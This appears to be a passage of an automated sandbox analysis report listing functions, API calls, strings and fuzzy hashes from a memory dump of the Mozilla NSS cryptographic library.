Opcode Fuzzy Hash: 3f2f14a018df6e234c304441d33c05cb0aca1985c7bb417779c75552f10091b2
Instruction Fuzzy Hash: 1D81D271A083019FE701CF24D840BAAB7E8AFC5358F04852DF958EB741E7B0E915CB96

Function 6C6E8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C6E9582), ref: 6C6E8F5B

Part of subcall function 6C6FBE30: SECOID_FindOID_Util.NSS3(6C6B311B,00000000,?,6C6B311B,?), ref: 6C6FBE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C6E8F6A

Part of subcall function 6C700FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6A87ED,00000800,6C69EF74,00000000), ref: 6C701000
Part of subcall function 6C700FF0: PR_NewLock.NSS3(?,00000800,6C69EF74,00000000), ref: 6C701016
Part of subcall function 6C700FF0: PL_InitArenaPool.NSS3(00000000,security,6C6A87ED,00000008,?,00000800,6C69EF74,00000000), ref: 6C70102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6E8FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C6E8FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C7CD820,6C6E9576), ref: 6C6E8FF9
DER_GetInteger_Util.NSS3(?), ref: 6C6E901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C6E903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6E9062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C6E90A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C6E90CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C6E90F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C6E912D
free.MOZGLUE(00000000), ref: 6C6E9136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C6E9145

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: e55c7e45465966ea5bf6585ce8958d49bb2a0509d4b2a14a783c739b9626f4f1
Instruction ID: ab11bbe4311369ab76cf573af192e1d079dd6b5de19208c3ffc72ad7243008aa
Opcode Fuzzy Hash: e55c7e45465966ea5bf6585ce8958d49bb2a0509d4b2a14a783c739b9626f4f1
Instruction Fuzzy Hash: 7B51F2B2A092009BE700CF28DC85BDBB7E4AF98358F05452AE854C7741E731E949CB9A

Function 6C7B4960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6C7B8061,?,?,?,?), ref: 6C7B497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C7B499E
GetLastError.KERNEL32(?,?,6C7B8061,?,?,?,?), ref: 6C7B49AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C7B8061,?,?,?,?), ref: 6C7B49C2

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6C7B8061,?,?,?,?), ref: 6C7B49D6
CreateSemaphoreA.KERNEL32(00000000,6C7B8061,7FFFFFFF,?), ref: 6C7B4A19
GetLastError.KERNEL32(?,?,?,?,6C7B8061,?,?,?,?), ref: 6C7B4A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C7B8061,?,?,?,?), ref: 6C7B4A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C7B8061,?,?,?,?), ref: 6C7B4A52
GetLastError.KERNEL32(?,?,?,?,6C7B8061,?,?,?,?), ref: 6C7B4A5A
free.MOZGLUE(00000000,?,?,?,?,?,6C7B8061,?,?,?,?), ref: 6C7B4A6A
CreateSemaphoreA.KERNEL32(?,6C7B8061,7FFFFFFF,?), ref: 6C7B4A9A
free.MOZGLUE(?,?,?,?,?,6C7B8061,?,?,?,?), ref: 6C7B4AAE
free.MOZGLUE(?,?,?,?,?,6C7B8061,?,?,?,?), ref: 6C7B4AC2

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: 272e2ea33eaaf82ab256f01cd7c42d0338a7819233be7c6664d7f6de7f39e166
Instruction ID: 9c97723983df8ec4b658a80303fee54d3fc8051af9a1b99cdbcd41b9b5b7caaf
Opcode Fuzzy Hash: 272e2ea33eaaf82ab256f01cd7c42d0338a7819233be7c6664d7f6de7f39e166
Instruction Fuzzy Hash: C341E774B00205ABDF10AFA8DE89B8A7BB8BB4A35AF140134F919F3781DB31D814C765

Function 6C6DADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C6DADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6DAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6DAE29

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6DAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6DAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6DAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C6DAEA0

Strings

n{l, xrefs: 6C6DAEB8, 6C6DAEE6
hKey = 0x%x, xrefs: 6C6DAE62, 6C6DAE72
C_MessageSignInit, xrefs: 6C6DADE1
hSession = 0x%x, xrefs: 6C6DAE01, 6C6DAE11
(CK_INVALID_HANDLE), xrefs: 6C6DAE1F, 6C6DAE80

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$n{l
API String ID: 332880674-22199973
Opcode ID: 8233f228db97a74b4143eac6cbbcaae479a787632bdc21fb1259228962d3770b
Instruction ID: b2f4254d505aa6aec9b1c5351b85ede507b0131ff2d44b98c199cae23f7ab220
Opcode Fuzzy Hash: 8233f228db97a74b4143eac6cbbcaae479a787632bdc21fb1259228962d3770b
Instruction Fuzzy Hash: B931E472705205AFDB109F14DD8CBAA3775AF4631DF054438F8096BA12DB34B909DBDA

Function 6C7BC8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6C7BC8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7BC8DA
malloc.MOZGLUE(00000001), ref: 6C7BC8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C7BC8F8
PR_NewLock.NSS3 ref: 6C7BC909
PR_NewCondVar.NSS3(00000000), ref: 6C7BC918
PR_NewCondVar.NSS3(00000000), ref: 6C7BC92A

Part of subcall function 6C690F00: PR_GetPageSize.NSS3(6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F1B
Part of subcall function 6C690F00: PR_NewLogModule.NSS3(clock,6C690936,FFFFE8AE,?,6C6216B7,00000000,?,6C690936,00000000,?,6C62204A), ref: 6C690F25

free.MOZGLUE(00000000), ref: 6C7BC947

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: 0bff809705245375f2d6aa8734a8bef969f8af3da49be1fca3007eeaa80fbea1
Instruction ID: 4ac7c27a3016ed5895bd5a4273d84b7d83352c9fb14ced52e343273bf78fdd6b
Opcode Fuzzy Hash: 0bff809705245375f2d6aa8734a8bef969f8af3da49be1fca3007eeaa80fbea1
Instruction Fuzzy Hash: 9D21FCF1A003025BEB206F799D4955B3BB8FF0125AF044438E86AD2B40E731E514C7A5

Function 6C6D2DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C6D2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D2E33

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C6D2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C6D2E81

Strings

n{l, xrefs: 6C6D2E99, 6C6D2EC4
C_InitPIN, xrefs: 6C6D2DF1
hSession = 0x%x, xrefs: 6C6D2E0E, 6C6D2E1E
pPin = 0x%p, xrefs: 6C6D2E63
ulPinLen = %d, xrefs: 6C6D2E7C
(CK_INVALID_HANDLE), xrefs: 6C6D2E2C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$n{l
API String ID: 1003633598-2202095043
Opcode ID: 0e38f5798ccbe9092d3ac0c463ded8fbcc8840343681e791ac0efe6c27e69bef
Instruction ID: f2ccf30580844f00e18e79f54d1e71bd1ea50d50cbc1da175d5e89819440da33
Opcode Fuzzy Hash: 0e38f5798ccbe9092d3ac0c463ded8fbcc8840343681e791ac0efe6c27e69bef
Instruction Fuzzy Hash: C931C471701156AFDB109F54DE4CB9A3BB5EF4631DF054038E808A7612DB34AD49CAEA

Function 6C6D6EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C6D6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6D6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6D6F53

Part of subcall function 6C7BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C6D6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C6D6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C6D6FA1

Strings

n{l, xrefs: 6C6D6FB9, 6C6D6FE7
hSession = 0x%x, xrefs: 6C6D6F2E, 6C6D6F3E
ulPartLen = %d, xrefs: 6C6D6F9C
pPart = 0x%p, xrefs: 6C6D6F83
C_DigestUpdate, xrefs: 6C6D6F11
(CK_INVALID_HANDLE), xrefs: 6C6D6F4C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$n{l
API String ID: 1003633598-642233528
Opcode ID: 67428c9526fff650907f77ef782dabbd541461bbef0730cabc69a6142af87e70
Instruction ID: 0dcb4e1b2da025695eb159fea2b9f5440cb4d519ba968e9ec751d7361505f96f
Opcode Fuzzy Hash: 67428c9526fff650907f77ef782dabbd541461bbef0730cabc69a6142af87e70
Instruction Fuzzy Hash: 7331C4757011559FDB109F64DE4CB8A3BB2EB4231DF094438E808A7612DB34F948CADA

Function 6C69AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C69AF47

Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C7690AB
Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C7690C9
Part of subcall function 6C769090: EnterCriticalSection.KERNEL32 ref: 6C7690E5
Part of subcall function 6C769090: TlsGetValue.KERNEL32 ref: 6C769116
Part of subcall function 6C769090: LeaveCriticalSection.KERNEL32 ref: 6C76913F

FreeLibrary.KERNEL32(?), ref: 6C69AF6D
free.MOZGLUE(?), ref: 6C69AFA4
free.MOZGLUE(?), ref: 6C69AFAA
PR_ExitMonitor.NSS3 ref: 6C69AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C69AFF5
PR_ExitMonitor.NSS3 ref: 6C69B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C69B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C69B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C69B03C

Strings

%s decr => %d, xrefs: 6C69AFF0
Unloaded library %s, xrefs: 6C69B023

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 6b0190f4b3aeeb88ab3021c7357810a639ce46fb763a5a4863c813d6944eff0b
Instruction ID: bfb305d1ad0846802d0e708f047597789f8998b4190d43ce694c5d373f9e2a52
Opcode Fuzzy Hash: 6b0190f4b3aeeb88ab3021c7357810a639ce46fb763a5a4863c813d6944eff0b
Instruction Fuzzy Hash: B53125B4F04102ABEB109F65DD48A46B7B5EB4532CF188139EC1697E01F732E828C7E9

Function 6C6E6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C6E781D,00000000,6C6DBE2C,?,6C6E6B1D,?,?,?,?,00000000,00000000,6C6E781D), ref: 6C6E6C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C6E781D,?,6C6DBE2C,?), ref: 6C6E6C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C6E781D), ref: 6C6E6C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C6E6C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C6E6C96

Part of subcall function 6C691240: TlsGetValue.KERNEL32(00000040,?,6C69116C,NSPR_LOG_MODULES), ref: 6C691267
Part of subcall function 6C691240: EnterCriticalSection.KERNEL32(?,?,?,6C69116C,NSPR_LOG_MODULES), ref: 6C69127C
Part of subcall function 6C691240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C69116C,NSPR_LOG_MODULES), ref: 6C691291
Part of subcall function 6C691240: PR_Unlock.NSS3(?,?,?,?,6C69116C,NSPR_LOG_MODULES), ref: 6C6912A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C6E6CAA

Strings

dbm, xrefs: 6C6E6CA4
NSS_DEFAULT_DB_TYPE, xrefs: 6C6E6C91
dbm:, xrefs: 6C6E6C3A
extern:, xrefs: 6C6E6C7E
rdb:, xrefs: 6C6E6C69
sql:, xrefs: 6C6E6C52

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: c92d2c90798be2799a967f3ed2b9fae3f0b186a90088b06c9e8716df954d7ec5
Instruction ID: 85b697781250e325a61587ba9057bc127d1199e381f39af581c71214bc1f46aa
Opcode Fuzzy Hash: c92d2c90798be2799a967f3ed2b9fae3f0b186a90088b06c9e8716df954d7ec5
Instruction Fuzzy Hash: 8A012BE270730527F510277E2E89F63360CDF4564DF140932FF14E0985EB92E61440AD

Function 6C728910 Relevance: 19.8, APIs: 13, Instructions: 304threadmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C71A9D0: PR_SetError.NSS3(00000000,00000000), ref: 6C71AA14

PR_GetCurrentThread.NSS3 ref: 6C728A52
PR_SetError.NSS3(FFFFD01F,00000000), ref: 6C728A92
PORT_Alloc_Util.NSS3(?), ref: 6C728B3B
memcpy.VCRUNTIME140(?,?,?), ref: 6C728B90
free.MOZGLUE(?), ref: 6C728BB6
PR_GetCurrentThread.NSS3 ref: 6C728BC7
PR_GetCurrentThread.NSS3 ref: 6C728C28
PR_SetError.NSS3(FFFFD044,00000000), ref: 6C728C57
PORT_NewArena_Util.NSS3(00000800), ref: 6C728C75
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C728C89
memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C728CA2
PR_GetCurrentThread.NSS3 ref: 6C728CC5
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C728CF6

Part of subcall function 6C71AB00: PR_SetError.NSS3(00000000,00000000,?,?,?), ref: 6C71AB5F

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CurrentErrorThreadUtil$Alloc_Arena_$ArenaFreefreememcpymemset
String ID:
API String ID: 3570957031-0
Opcode ID: 12e25ce55f3a0d221f079adcc7701f56becc5d23700c9f91f53484be4ba271ce
Instruction ID: 00f854d51d8f35b904078bcba3cff00449bc0cb387bb4f5076ee40f89e3fb6ce
Opcode Fuzzy Hash: 12e25ce55f3a0d221f079adcc7701f56becc5d23700c9f91f53484be4ba271ce
Instruction Fuzzy Hash: 9BB196B25093419BE710CF24CE44B6B77E8FF84358F04456AF9498BB52E736DA88C792

Function 6C6F4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C6B78F8), ref: 6C6F4E6D

Part of subcall function 6C6909E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6906A2,00000000,?), ref: 6C6909F8
Part of subcall function 6C6909E0: malloc.MOZGLUE(0000001F), ref: 6C690A18
Part of subcall function 6C6909E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C690A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C6B78F8), ref: 6C6F4ED9

Part of subcall function 6C6E5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C6E7703,?,00000000,00000000), ref: 6C6E5942
Part of subcall function 6C6E5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C6E7703), ref: 6C6E5954
Part of subcall function 6C6E5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E596A
Part of subcall function 6C6E5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E5984
Part of subcall function 6C6E5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C6E5999
Part of subcall function 6C6E5920: free.MOZGLUE(00000000), ref: 6C6E59BA
Part of subcall function 6C6E5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C6E59D3
Part of subcall function 6C6E5920: free.MOZGLUE(00000000), ref: 6C6E59F5
Part of subcall function 6C6E5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C6E5A0A
Part of subcall function 6C6E5920: free.MOZGLUE(00000000), ref: 6C6E5A2E
Part of subcall function 6C6E5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C6E5A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4EB3

Part of subcall function 6C6F4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6F4EB8,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F484C
Part of subcall function 6C6F4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6F4EB8,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F486D
Part of subcall function 6C6F4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C6F4EB8,?), ref: 6C6F4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4EC0

Part of subcall function 6C6F4470: TlsGetValue.KERNEL32(00000000,?,6C6B7296,00000000), ref: 6C6F4487
Part of subcall function 6C6F4470: EnterCriticalSection.KERNEL32(?,?,?,6C6B7296,00000000), ref: 6C6F44A0
Part of subcall function 6C6F4470: PR_Unlock.NSS3(?,?,?,?,6C6B7296,00000000), ref: 6C6F44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C7CDCB0,00000000), ref: 6C6F4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C6F501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C6B78F8), ref: 6C6F506B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

